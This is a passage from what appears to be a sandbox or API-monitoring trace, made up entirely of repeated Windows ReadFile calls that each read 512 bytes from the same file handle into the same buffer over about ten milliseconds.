lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.342] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.343] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.344] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, 